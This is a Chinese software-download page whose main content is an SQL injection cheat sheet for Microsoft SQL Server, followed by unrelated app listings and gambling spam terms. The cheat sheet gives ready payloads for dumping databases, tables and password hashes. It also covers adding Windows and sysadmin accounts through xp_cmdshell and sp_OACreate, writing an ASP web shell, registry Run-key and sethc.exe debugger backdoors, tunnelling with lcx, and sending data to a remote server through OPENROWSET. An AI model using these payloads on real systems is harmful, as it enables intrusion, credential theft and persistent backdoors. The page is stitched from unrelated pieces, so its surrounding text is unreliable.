菲哥哥注入语句笔记是一款sql注入工具,它可以注入一些要注意的东西,Sql注射经验,写成笔记了。天下布魔wiki百科官方APP下载-天下布魔wiki百科全人物图鉴4.0 最新版
1.爆所有库名
+union+select+name,filename,3,4,5+from+master.dbo.sysdatabases
//name数据库名filename数据库物理路径
+union+select+name,filename,3,4,5+from+master.dbo.sysdatabases+where+and+dbid=x+filename>0
//爆破数据库路径换dbid值就可以

+union+select+1,(select+name+from+master.dbo.sysdatabases+for+xml+path),3,4,5–
and0<>db_name(n)–
n改成0,1,2,3……就可以跨库
2.爆所有表名
+union+select+table_name,2,3,4,5+TABLE_CAtalog,table_schema+from+information_schema.tables–
//table_catalo保存当前数据库名称,table_name保存当前数据库中所有表
+select+name,id,crdate,4,5+from+数据库名.dbo.sysobjects+where+xtype=’u.+and+status>=0–
//name表名id表的idxtype=’u’u代表用户自定义的表crdate为数据库的创建时间ststus>=0
/+union+select+name,object_id,3,4,5+fromsys.tables–
3.爆所有字段名
+union+select+name,id,3,4,5+from+数据库名称.dbo.syscolumns+where+xtype=167+and+id=5575058–
//id是在爆破表名时候的id值syscolumns中的id和sysobjects中的id主外键关系
+union+select+name+from+syscolumns+where+charindex(‘pass’,name)>0
//查询含有“pass”的字段
+union+SELECTname,2,3,4,5FROMsyscolumnsWHEREid=(SELECTidFROMsysobjectsWHEREname=‘yixiang_bizre’)
//查询yixiang_bizre表中的所有字段
+union+select+table_name,column_name,3,4,5+from+information_schema.COLUMNS–
//table_name表名称column_name字段名
4.添加用户
1、declare@oint;
2、execmaster..sp_oacreate'Shell.Application',@oout;
3、execmaster..sp_oamethod@o,'ShellExecute',NULL,'cmd.exe','/cnetuserfuckfuck/add
5.判断是不是SQL库
andexists(select*fromsysobjects)
6.所有账户名
+union+select+(selectname+’||’+password_hashfrom+sys.sql_loginsforxmlpath),2,3,4,5+from+sys.sql_logins//
7.加SQL账户
1、--创建个登陆mssql的帐号
2、;execmaster.dbo.sp_addloginname,pass;--
3、--把创建的mssql登陆帐号提升到sysadmin
4、;execmaster.dbo.sp_addsrvrolemembername,sysadmin;--
8.启动组写入命令行和执行
EXECmaster.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowsCurrentVersionRun’,’help1′,’REG_SZ’,’cmd.exe/cnetusertestptlove/add’-
9.LCX语句
;execmaster..xp_cmdshell‘D:m目录lcx.exe-slave本机ip51目标内网ip3389′–
//目标机器执行
lcx.exe-listen512007
//本机执行连接本机的的2007端口就可以了
10.win200爆目录
xp_regread读取HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesW3SVCParametersVirtualRoots–
//获取WEB路径
11.恢复xp_cmdshell
;EXECmaster.dbo.sp_addextendedproc‘xp_cmdshell’,’e:inetpubwwwrootxplog70.dll’
//把xplog70.dll文件给他上传到e:inetpubwwwroot目录下了
12.open数据
insertintoOPENROWSET(‘SQLOLEDB’,‘server=ip;uid=user;pwd=123456!’,‘selectcfromcmd’)selectusernamefromtest
//把test是本地表,中username的值插入到远程cmd表中的c字段里
13.判断权限
1、+and+1=(select+IS_SRVROLEMEMBER('sysadmin'))--
2、//sa权限
3、and(selectIS_MEMBER('db_owner'))=1-- // dbo
4、and(selectIS_MEMBER('public'))=1-- //public
14.DIR目录
遍历系统的目录结构,分析结果并发现WEB虚拟目录,先创建一个临时表:
temphttp://www.XXXX.com/FullStory.asp?id=1;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));
–接下来:我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中:http://www.XXXX.com/FullStory.asp?id=1;inserttempexecmaster.dbo.xp_availablemedia;–?我们可以通过查询temp的内容来获得驱动器列表及相关信息或者利用xp_subdirs获得子目录列表,并存入temp表中:http://www.XXXX.com/FullStory.asp?id=1;insertintotemp(id)execmaster.dbo.xp_subdirs‘c:’;–?
我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中:http://www.XXXX.com/FullStory.asp?id=1;insertintotemp(id,num1)execmaster.dbo.xp_dirtree‘c:’;–
这样就可以成功的浏览到所有的目录(文件夹)列表?如果我们需要查看某个文件的内容,可以通过执行xp_cmdsell:;insertintotemp(id)execmaster.dbo.xp_cmdshell‘typec:webindex.asp’;–?
使用’bulkinsert’语法可以将一个文本文件插入到一个临时表中。
如:bulkinserttemp(id)from‘c:inetpubwwwrootindex.asp’浏览temp就可以看到index.asp文件的内容了!通过分析各种ASP文件,可以得到大量系统信息,WEB建设与管理信息,甚至可以得到SA帐号的连接密码。
15.判断站库分离
+and+host_name()==@@servername-- //判断站库是否分离
16.存储总结
xp_availablemedia显示系统上可用的盘符’C:’xp_availablemedia
xp_enumgroups列出当前系统的使用群组及其说明xp_enumgroups
xp_enumdsn列出系统上已经设置好的ODBC数据源名称xp_enumdsn
xp_dirtree显示某个目录下的子目录与文件架构xp_dirtree‘C:inetpubwwwroot’
xp_getfiledetails获取某文件的相关属性xp_getfiledetails‘C:inetpubwwwroot.asp’
dbp.xp_makecab将目标计算机多个档案压缩到某个档案里所压缩的档案都可以接在参数的后面用豆号隔开
dbp.xp_makecab’C:lin.cab’,’evil’,1,’C:inetpubmdb.asp’
xp_unpackcab解压缩xp_unpackcab‘C:hackway.cab’,’C: emp’,1
xp_ntsec_enumdomains列出服务器域名xp_ntsec_enumdomains
xp_servicecontrol停止或者启动某个服务xp_servicecontrol‘stop’,’schedule’
xp_terminate_process用pid来停止某个执行中的程序xp_terminate_process123
dbo.xp_subdirs只列某个目录下的子目录dbo.xp_subdirs‘C:’
17.判断xp_cmdshell
+and+1=(select+count(*)+FROM+master.dbo.sysobjects+where+xtype+=‘X’+AND+name+=‘xp_cmdshell’)
18.判断系统为win2003
And+charindex('5.3',@@verisdn)
19.echo写shell
;execmaster.dbo.xp_cmdshell'echo^<scriptlanguage=VBScriptrunat=server^>executerequest^("^)^</script^>>c:\mu.asp'-
20.停掉服务
execmaster..xp_servicecontrol‘stop’,’schedule’
execmaster..xp_servicecontrol‘start’,’schedule’
有多少删减。另外添加几句个人经常用到的SQL注入和提权的语句
当xp_cmshell被删除或者无法使用的情况,我们不妨试试利用SP_OACreate和SP_OAMETHOD调用系统wscript.shell执行系统命令。
Declare@runshellINT
ExecSP_OACreate‘wscript.shell’,@runshellout
ExecSP_OAMeTHOD@runshell,’run’,null,’netuserlengflengf/add’
当这些都失败了,试试关闭系统沙盒模式,它在注册表的位置是
HKEY_LOCAL_MACHINESoftwareMicrosoftJet4.0EngineSandBoxMode
默认键值为2,即只在Access的模式下开启沙盒模式,对应的键值是
0—在任何所有者中禁止启用安全模式
1–为仅在允许范围内
2–必须在access模式下
3–完全开启
我们要将其设置为0就可以关闭了,通过SQL语句实现
Execmaster.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE,’SoftwareMicrosoftJet4.0Engine’,’SandBoxMode’,’REG_DWORD’,0
执行关闭成功后就可以执行系统命令
select*fromOpenRowSet(‘Microsoft.Jet.OLEDB.4.0′,’;DataBase=c:windowssystem32iasias.mdb’,’selectshell(“netuserlengflengf/add”)’)
上面是提权思路。另外提下两种备份:
(1)Log备份(hta)
alertdatabase[dbname]setRECOVERYFULL–
createtablecmd(aimage)–
backuplog[dbname]todisk=’c:hta’withinit–
insertintocmd(a)values(‘[command]‘)–
backuplog[dbname]todisk=’系统启动目录hello.hta’–
droptablecmd–
(2)差异备份
backupdatabase[dbname]todisk=’c:db.bak’–
createtablecmd(cmdimage)–
insertintocmd(cmd)values(‘[command]‘)–
backupdatabase[dbname]todisk=’系统启动目录hello.hta’WITHDIFFERENTIALFORMAT–
droptablecmd–
经验告诉我,将你要执行的command转换成十六进制成功率会比较高,但是这个比较被动。
另外就是可以通过注册表添加run启动项添加用户命令,这种也是被动,要等服务器重启。
看了这个工具,觉得还缺少一个很使用的方法,那就是映像劫持,位于注册表位置:
HKEY_LOACAL_MACHINESoftwareMicrosoftWindowsNTCurrentVersionImageFileExecutionOptions
在这个键下面有一个Debugger的参数,如果不为空,就会处理。添加映像劫持方法的SQL语句如下:
execMaster.dbo.xp_regWrite‘HKEY_LOACAL_MACHINE’,’Software\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\sethc.exe’,’debugger’,’REG_SZ’,’c:windowssystem32cmd.exe’
博众彩成语 博彩美缝剂好不 励博体育单招网 双色球助手选号 NBA投注网址展开内容
常州大学移动校园app下载-常州大学移动校园ios版1.8.8 官方苹果版
临湘在线下载-临湘在线app5.3.1 安卓版
捷波朗蓝牙耳机app官方版下载-捷波朗耳机Jabra Sound+安卓中文版5.18.0 最新版
火柴人暗影军团2中文版下载-火柴人暗影军团2手机版1.0.1 最新版
和泉纱雾全彩本子打包免费下载-和泉纱雾全彩本子高清完整版打包下载
J111~114内隔墙建筑构造dpf 【合订本】免费下载
绿豆云影app下载-绿豆云影内置源2.1.2240104 最新版
货运帮下载安装-货运帮app4.1.2 安卓最新版
大掌门免费版安装-大掌门安卓版(大掌门免费版)1.9.9 官网最新版
小兵软件加密工具4.0 绿色版
yy注册机下载-灰灰YY全自动注册机v3.5 绿色免费版
策略手游app下载-策略手游软件1.0 免费版
以撒的结合重生噩梦mod免费版-以撒的结合重生噩梦mod绿色免费版
54校园app1.0.0 安卓版
百词斩爱阅读ios免费下载-百词斩爱阅读苹果最新版1.0.0 官方iPhone版
讲究起名软件下载-讲究起名app1.1.3 安卓版
宝宝恐龙世界下载-宝宝恐龙世界游戏4.30.2111c 安卓免费版
Lydsto扫地机器人app下载-Lydsto扫地机器人app1.6.4 安卓版
君临传奇折扣平台版本下载-君临传奇GM折扣版3.0.0 安卓版
51看剧app下载-51看剧app最新版4.9.0 官方版
坦克世界0.9.20.1.1黑科技插件包下载-坦克世界黑科技最新0.9.20.1.1完整免费版
苹果iOS10.3.2固件下载-苹果iOS10.3.2正式版固件官网最新版
sql智能提示编程工具(sqldbx)3.52 免费安装版
排班助手app下载-排班助手app5.4.1 手机版
8.5/988.9M
现在很多公司喜欢出去玩,这时候人很多就需要租一个大巴车。当然租车合同还是必须要签订的,这里为大家带来了大巴车租赁合同,你可以查看里面的条例,进行修改,直接打印就...
足协模拟器免广告版下载-足协模拟器免广告版1.0.1 安卓版
7.7/647.5M
足协模拟器是一款全新推出的足球题材体育竞技手游。玩家是需要去带领自己旗下的球队在这里去不断的发展的,去从一个小的世界开始比赛的直到世界杯!你需要培养一支优秀的足...
9.2/1,285.5M
是一款专业的空调维修服务技师端软件,技工师傅可以在这个平台上快速的进行接单服务,帮助用户一键进行空调的维护工作,让用户更好享受空调生活。佳运技师介绍佳运生活服务...
9.1/568.4M
企虎干洗店管理软件是一款专业的洗衣店管理软件,它集前台收费收银系统,会员卡管理系统,财务报表系统等强大功能为一身,系统界面简洁优美,操作直观简单,帮助你快速的整...
7.5/14.4M
樱岛动漫app是一款可以免费看动漫的app,里面的动漫资源很丰富,无论是热门的番剧还是冷门的小众作品,在这里都可以找到,而且都是实时更新的,里面的动画基本上是由...
8.1/437.8M
餐饮加盟网是一个美食餐饮加盟平台,有要自己创业又没有渠道的朋友们可以加入餐饮加盟网,在这里学习技能加盟入驻,开一家属于自己的餐饮店。平台优势:全营销模式,震撼业...
9.5/1,213.7M
VV租号是一款实用的游戏租号软件,各种大型游戏账号应用尽有,平台监督,买卖放心,让平民玩家也可以畅玩土豪游戏。VV租号app介绍【VV租号平台】游戏群体必备神器...
超高仿iOS14桌面主题app下载最新2024-安卓仿苹果ios14主题桌面下载(iOS Launcher)7.2.8 免费版
7.9/88.7M
安卓仿苹果ios14主题桌面是一款能够将安卓手机美化成为苹果的桌面,此软件适合国内全部安卓品牌手机,让你的手机变得和苹果IOS系统一般无二,更加流畅丝滑,还等什...
8.8/1,788.1M
“扫帚飞行MOD”是一款原创的功能道具mod,添加了可以供人骑乘飞行的魔女扫帚,让你可以轻松冒险,带有完善的操纵方式!注意事项MOD适用于游戏版本v1.16.4...
涂鸦躲避Grumz游戏下载-涂鸦躲避Grumz1.0 安卓版
9.7/1,687.1M
涂鸦躲避Grumz是玩一款非常唯美的休闲游戏,玩家需要躲避屏幕出现的各种小球,来达到自己的目的,需要的下载吧。官方介绍:《Grumz》介绍了一个有趣而简单的核心...
9.3/750.9M
自动点击助手是一款可以帮助用户进行自动化点击或其他类型的操作,通常用于游戏作弊、自动化测试、数据采集或其他需要重复性点击或操作的场景,可以节省用户的时间,提高成...
8.3/98.2M
激萌三国手游是一款最新推出的三国题材策略游戏,融入了养成玩法,玩家可以收集喜欢的武将来养成,培养出一支强大的军队,然后可以挑战其他玩家!激萌三国游戏介绍激萌三国...
7.7/697.2M
生命立春是一款集合了生命科学应用和健康诊疗管理服务,让您拥有和管理属于自己的生命健康的管理平台。通过生命立春,您能全方位、精准的掌握生命状况,同时享受精准的诊疗...
7.9/1,402.1M
手机主题可以让手机界面更好看,实时动态天气主题不仅非常好看,还有实时的动态天气,让手机屏幕跟天气一样会下雨下雪,好看又实用。这是即时天气极简版,您可以免费升级到...
玩个锤子游戏下载-玩个锤子Getting Over It游戏pc版免费版
8.1/830.8M
玩个锤子是一款最新非常火的单机游戏,玩家开局一把锤子就能开始爬山,并用它来爬山,稍微不小心就会掉下去,只要掉下去了,就要从头再来,很多小伙伴都是快到山顶的时候掉...
网易初音速ios下载-网易初音速手游苹果版0.2.1 官网ios正版
9.0/1,768.7M
网易初音速手游苹果版是一款非常值得期待的手游,给大家提供的是最新的ios版本下载,很多用户都不知道ios怎么下载,这个是需要提前预约才能玩的哦,给大家提供下载和...
7.6/1,161.0M
专为商务干部在线学习平台,平台拥有丰富的学习资源,专业优质,可以让用户随时随地移动学习提升能力,积极探索干部教育培训工作与新媒体的深度融合,为干部培训提供专业化...
使命召唤11高级战争最高难度通关存档下载-使命召唤11高级战争最高难度通关存档绿色版
7.9/1,127.9M
使命召唤11高级战争最高难度通关存档是玩家自己打出来的通关存档文件,使用后可以解锁很多内容,玩家也可以选择要玩的关卡进行单独的任务!需要的网友可以来东坡网下载!...
9.0/1,360.9M
家庭宽带测速是一款专业级手机WiFi测速工具,支持一键快速检测当前网络的上传/下载速度、延迟等核心指标,以可视化图表直观呈现网速数据,助力用户对比不同WiFi信...
8.5/1,127.5M
模拟山羊三项修改器是一款超强的游戏模拟山羊的游戏修改器。超级跳跃教你做人。有需要的可以来东坡下载使用!模拟山羊三项修改器使用说明使用说明1、先运行游戏,再运行修...
7.7/859.5M
天天菜谱软件是一款非常方便的做出食谱,每天上千用户提供不同的一日三餐食谱大全,让你的每一餐都与众不同,每天变着花样吃进天下所有美食!应用信息2012年8月6日,...
Ashampoo WinOptimizer 2014(系统优化工具)v1.0.0 绿色破解版
8.1/339.7M
AshampooWinOptimizer2014是由Ashampoo公司新出品的一款多功能系统优化工具,这个是国外大神制作的绿色单文件版,全部程序封装为单独一个...
Inviewer中文版下载-Inviewer(windows照片查看器)1.0 官方最新版
7.6/295.8M
今天东坡小编就给喜欢在电脑上浏览各种各样的美图的朋友,介绍一款很多的朋友都是非常的喜欢用的一个简单的windows照片查看器,可以支持图像转换,让你感受一下不一...
7.5/776.2M
飞火壁纸app是一款非常不错的手机壁纸软件,可以帮助用户设置个性手机壁纸,拥有许多精美的壁纸素材,让你的手机更精美!飞火壁纸app介绍飞火壁纸软件是一个集桌面动...
10.0/14.3M
51万年历是一款非常实用的万年历软件,这款软件集合了日历、农历等多种功能于一体,大大方便了用户的日常生活!喜欢的网友赶紧来下载吧!51万年历简介最适合中国人的万...